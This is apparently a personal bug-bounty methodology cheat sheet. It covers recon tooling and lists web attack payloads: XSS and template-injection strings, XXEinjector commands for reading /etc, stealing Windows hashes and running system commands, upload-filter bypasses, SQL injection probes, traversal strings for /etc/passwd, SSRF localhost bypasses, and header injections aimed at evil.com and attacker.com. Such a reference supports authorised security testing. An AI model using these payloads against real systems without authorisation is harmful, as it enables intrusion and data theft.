Skip to content

Methodology

this is my personal bug hunter methodology/cheatsheet I collect from my experience and from other resources. This writing reference (like reporting) is based on pentesting method, but you can use the same method to do a bug hunting.

dont worry if you are confused, me too:) , just brainstorming on it, have a nice day ;)

Finding Target with Dork

  1. looking for target from

  2. google-hacking-database

    looking for 

    site:domain <dork>

List of Tests Perform

Information Gathering

Subdomain lister

# enumerate subdomain
#!/bin/bash
# $1=example.domain

python sublist3r.py -d $1

amass enum --passive -d $1 -o domains_$1
assetfinder --subs-only $1 | tee -a domains_$1

subfinder -d $1 -o domains_subfinder_$1
cat domains_subfinder_$1 | tee -a domains_$1

sort -u domains_$1 -o domains_$1
cat domains_$1 | filter-resolved | tee -a domains_$1.txt

# enumerate subdomain
subfinder -d example.com -o subexample.txt
# check active subdomain
httpx -l subexample.txt -o active_subexample.txt -threads 200

# check status response
cat alive-subdomains.txt | parallel -j50 -q curl -w 'Status:%{http_code}\t  Size:%{size_download}\t %{url_effective}\n' -o /dev/null -sk > scan_output.txt

shodan domain example.com | awk '{print $3}' | httpx -silent | nuclei -t /home/ofjaaah/PENTESTER/nuclei-templates/

subfinder -d example.com | nuclei -es info,low

Use grep to extract URLs

cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*

curl http://example.com/ | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*

Find javascript files using gau and httpx

echo target.com | gau | grep '\.js$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript'

Extract API endpoints from javascript files

cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u

Find JavaScript files with httpx and subjs

cat domains | httpx -silent | subjs | anew

$ git clone https://github.com/KathanP19/JSFScan.sh
$ cd JSFScan.sh/
$ docker build . -t jsfscan

$ docker run -it jsfscan "/bin/bash"

$ cat target.txt
https://example.com
https://example2.com

$ bash JSFScan.sh -l target.txt --all -r -o output.ru

$ docker cp <container_id>:/path/output.ru /wheretoplace/output.ru

# open output.ru/report.html in browser

SecretFinder

$ git clone https://github.com/m4ll0k/SecretFinder.git secretfinder
$ cd secretfinder
$ python -m pip install -r requirements.txt or pip install -r requirements.txt
$ python3 SecretFinder.py

Nuclei

# https://github.com/projectdiscovery/nuclei
# https://nuclei-templates.netlify.app/
# sudo apt install nuclei OR using go

echo "https://example.com" | nuclei -t /home/kali/nuclei-templates -severity low,medium,high,critical 
cat targets.txt | nuclei -t /home/kali/nuclei-templates -severity low,medium,high,critical 
cat targets.txt | nuclei -t /home/kali/nuclei-templates -severity low,medium,high,critical -ept ssl 
nuclei -l targets -severity low,medium,high,critical -ept ssl -o output.txt

xray

# https://github.com/chaitin/xray
# https://github.com/chaitin/xray/releases/tag/1.9.11
xray webscan --basic-crawler http://example.com --html-output vuln.html

Using VPS

# list screen session
screen ls
# create screen session
screen -S bugbounty-auto
# attach screen session
screen -r -d bugbounty-auto

Assetfinder

assetfinder example.com | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"; done

Find website built with Wappalizer

git clone https://github.com/vincd/wappylyzer.git
cd wappylyzer
pip install -r requirements.txt
cat urls-alive.txt | parallel -j 50 "echo {}; python3 main.py analyze --url {}"

search interesting parameters

# install Gf and Gf-pattern: https://www.youtube.com/watch?v=w8q9CJ5GioI
git clone https://github.com/tomnomnom/gf.git
cd gf
go build main.go
mv main gf
sudo mv gf /usr/bin

git clone https://github.com/mrofisr/gf-patterns.git
mkdir ~/.gf
cp gf-patterns/*.json ~/.gf

cat url-list.txt | gf redirects

# https://github.com/devanshbatham/ParamSpider

paramspider -d example.com
paramspider -l domains.txt
paramspider -d example.com -p '"><h1>reflection</h1>'
paramspider --domain <target_domain> --level high --output params.txt

echo "domain" | ~/go/bin/waybackurls -no-subs | tee urls.txt
cat domains.txt | ~/go/bin/waybackurls -no-subs | tee urls.txt
cat urls.txt | gf xss | sed 's/=.*/=/' | sed 's/URL: //' | sort -u | tee xss-output.txt
gf xss urls.txt | sed 's/=.*/=/' | sed 's/URL: //' | sort -u | xss-output.txt
cat xss-output.txt | dalfox pipe

Waybackurls

go install github.com/tomnomnom/waybackurls@latest

waybackurls url
cat domains.txt | waybackurls > urls

CVE search for knowing clue

  1. go to https://cve.mitre.org/cve/search_cve_list.html
  2. search something like, laravel / laravel input / wordpress missconfiguration / etc

Checking for the WAF

wafw00f --help
wafw00f <url>

Testing

XSS

Simple XSS check 

#!/bin/bash
# $1 => example.domain

subfinder -d $1 -o domains_subfinder_$1
amass enum --passive -d $1 -o domains_$1

cat domains_subfinder_$1 | tee -a domain_$1
cat domains_$1 | filter-resolved | tee -a domains_$1.txt

cat domains_$1.txt | ~/go/bin/httprobe -p http:81 -p http:8080 -p https:8443 | waybackurls | kxss | tee xss.txt

Javascript polyglot for XSS 

-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>

XSS Tools

  • XSSHunter
  • XSStrike 
    python xsstrike.py -u https://example.com/?id=1
python xsstrike.py -u https://example.com/path/to/somewhere
  • xss_vibes 
    git clone https://github.com/faiyazahmad07/xss_vibes
pip3 install -r requirements

python3 main.py -f urls.txt -o vuln.txt
python3 main.py -f urls.txt -H "Cookies:test=123;id=asdasd, User-Agent: Mozilla/Firefox" -t 7 -o result.txt
python3 main.py -f urls.txt -H "Cookies:test=123;id=asdasd" -t 7 -o result.txt
python3 main.py -u http://example.com/hpp/?pp=12 -o out.txt
python3 main.py -u http://example.com/hpp/?pp=12 -o out.txt --waf
python3 main.py -u http://example.com/hpp/?pp=12 -o out.txt -w cloudflare
cat katana.txt | python3 main.py --pipe -t 7
  • dalfox 
    go install github.com/hahwul/dalfox/v2@latest
dalfox url http://testphp.vulnweb.com/listproducts.php\?cat\=123\&artist\=123\&asdf\=ff -b https://your-callback-url
dalfox file urls_file --custom-payload ./mypayloads.txt
cat urls_file | dalfox pipe -H "AuthToken: bbadsfkasdfadsf87"
  • https://bxsshunter.com/

  • https://xss.report/

  • $200 Bounty for REFLECTED XSS Vulnerability | BUG BOUNTY

  • $1000 XSS | Bug Bounty POC 2023
  • Reflected xss bug bounty poc | #bugbountypoc

there is login redirect

?redirectUrl=/me/m">
?redirectUrl=/me/m</script><svg/onload=prompt(document.domain)>

edit profile link 

https://google.com
click link / open for new browser
go to inspect element console 
opener.location="alert"
will open https://google.com/alert from previous browser

...
Referer: http://www.google.com/search?hl=en&q=c5obc'+alert()+'p7yd5

}}})</script><script>alert()</script>

XXE

XXEInjector

  • XXEinjector 
    # Enumerating /etc directory in HTTPS application:
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl
# Enumerating /etc directory using gopher for OOB method:
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher
# Second order exploitation:
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt
# Bruteforcing files using HTTP out of band method and netdoc protocol:
ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc
# Enumerating using direct exploitation:
ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARKSTART,UNIQUEMARKEND
# Enumerating unfiltered ports:
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all
# Stealing Windows hashes:
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes
# Uploading files using Java jar:
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf
# Executing system commands using PHP expect:
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls
# Testing for XSLT injection:
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt
# Log requests only:
ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt

SSRF

SSRFDetector

  • ssrfDetector 
    git clone https://github.com/JacobReynolds/ssrfDetector.git
docker-compose build
docker-compose up

docker-compose down
docker-compose up

Git

Work with Git

  • GitTools 

    git clone https://github.com/internetwache/GitTools.git
./gitfinder.py -h

wget http://s3.amazonaws.com/alexa-static/top-1m.csv.zip
unzip top-1m.csv.zip
sed -i.bak 's/.*,//' top-1m.csv
./gitfinder.py -i top-1m.csv

./gitdumper.sh -h

./extractor.sh /tmp/mygitrepo /tmp/mygitrepodump

  • git-all-secrets

Rate Limit

Bypass Rate Limit 

X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Host: IP
X-Forwared-Host: IP

Bypass 403 & 401

just directly go to book.hacktricks.xyz

Open redirect

Find open redirect 

echo "http://tesla.com" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew

Upload vuln

ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
SVG: Stored XSS / SSRF / XXE
GIF: Stored XSS / SSRF
CSV: CSV injection
XML: XXE
AVI: LFI / SSRF
HTML / JS : HTML injection / XSS / Open redirect
PNG / JPEG: Pixel flood attack (DoS)
ZIP: RCE via LFI / DoS
PDF / PPTX: SSRF / BLIND XXE

/?file=xx.php    <-- Blocked
/?file===xx.php  <-- Bypassed

file.jpg%00shell.php
shell.php%00file.jpg
shell.php%00.jpg

./../../tmp/lol.png
sleep(10)-- -.jpg
<svg onload=alert(document.domain)>.jpg/png
; sleep 10;

SQL Injection

Test for SQL Injection 

/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||'  <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='

Some of Directory Traversal 

\..\WINDOWS\win.ini
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
.?\.?\.?\etc\passwd
../../boot.ini
%0a/bin/cat%20/etc/passwd
\\&apos;/bin/cat%20/etc/passwd\\&apos;
..%c1%afetc%c1%afpasswd

Some of SSRF bypass 

http://127.127.127.127
http://127.0.0.0
http://127.1
http://0
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
urllib : 3.3.3.3
http://127.1.1.1:80\@127.2.2.2:80/
http://[::]:80/
http://0000::1:80/
http://127.1/
http://0000::1:80/
http://[::]:80/
http://2130706433/
http://whitelisted@127.0.0.1
http://0x7f000001/
http://017700000001
http://0177.00.00.01
http://⑯⑨。②⑤④。⑯⑨。②⑤④/
http://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/
http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/
http://②⑧⑤②⓪③⑨①⑥⑥:80/
http://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/
http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80/
http://127.0.0.1.nip.io:8080 -> 127.0.0.1:8080
http://0xd8.0x3a.0xd6.0xe3
http://0xd83ad6e3
http://0xd8.0x3ad6e3
http://0xd8.0x3a.0xd6e3
http://0330.072.0326.0343
http://000330.0000072.0000326.00000343
http://033016553343
http://3627734755
http://%32%31%36%2e%35%38%2e%32%31%34%2e%32%32%37
http://216.0x3a.00000000326.0xe3

Valid email address 

“payload”@domain.com
name@”payload”domain.com
name(payload)@domain.com
name@(payload)domain.com
name@domain.com(payload)

Uri PATH

https://target.com/admin/
https://target.com/admin..;/
https://target.com/../admin
https://target.com/whatever/..;/admin
https://site.com/secret
https://site.com/secret/
https://site.com/secret/.
https://site.com//secret//
https://site.com/./secret/..
redirect_to=////evil%E3%80%82com
https://target.com/admin
https://target.com/admin%20/
https://target.com/%20admin%20/
https://target.com/admin%20/page
/accessible/..;/admin
/.;/admin
/admin;/
/admin/~
/./admin/./
/admin?param
/%2e/admin
/admin#

Unicode-Mapping-on-Domain-names

identify session invalidation issues

  1. Log in to the application
  2. Navigate around the pages
  3. Logout
  4. Press ( Alt + left-arrow ) buttons
  5. If you are logged in or can view the pages navigated earlier by the user, then give yourself a pat.

Host Header Injection

X-Forwarded-Host: bing.com"><img src/onerror=prompt(document.cookie)>

GET /admin HTTP/1.1
Host: localhost

X-Forwarded-Host: evil.com

Web Cache Poisoning

Th0h0/autopoisoner
Hackmanit/Web-Cache-Vulnerability-Scanner

GET /en?region=uk HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: a."><script>alert(1)</script>"

GET / HTTP/1.1
Host: vulnerable.com
Cookie: session=VftzO7ZtiBj5zNLRAuFpXpSQLjS4lBmU; fehost=asd"%2balert(1)%2b"

GET /resources/js/tracking.js HTTP/1.1
Host: acc11fe01f16f89c80556c2b0056002e.web-security-academy.net
X-Forwarded-Host: ac8e1f8f1fb1f8cb80586c1d01d500d3.web-security-academy.net/
X-Forwarded-Scheme: http

GET / HTTP/1.1
Host: vulnerbale.net
User-Agent: THE SPECIAL USER-AGENT OF THE VICTIM
X-Host: attacker.com

Web Cache Deception

akr3ch/deceptor
https://hackerone.com/reports/593712

HTTP Request Smuggling

Subdomain Takeover

https://www.virustotal.com/gui/domain/<SUBDOMAIN>/relations
go to https://httpstatus.io/ to check status for each subdomain, look only for the 404 response 
nslookup sub.domain.com
check the vuln on can-i-take-over-xyz

Cross-Origin Resource Sharing

Dependency Confusion / Abuse

Content Injection

wpscan --url <URL> --api-token <API_TOKEN>

python2 BBH.py

Client-Side Template Injection

{{(_sub=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}

IDOR

References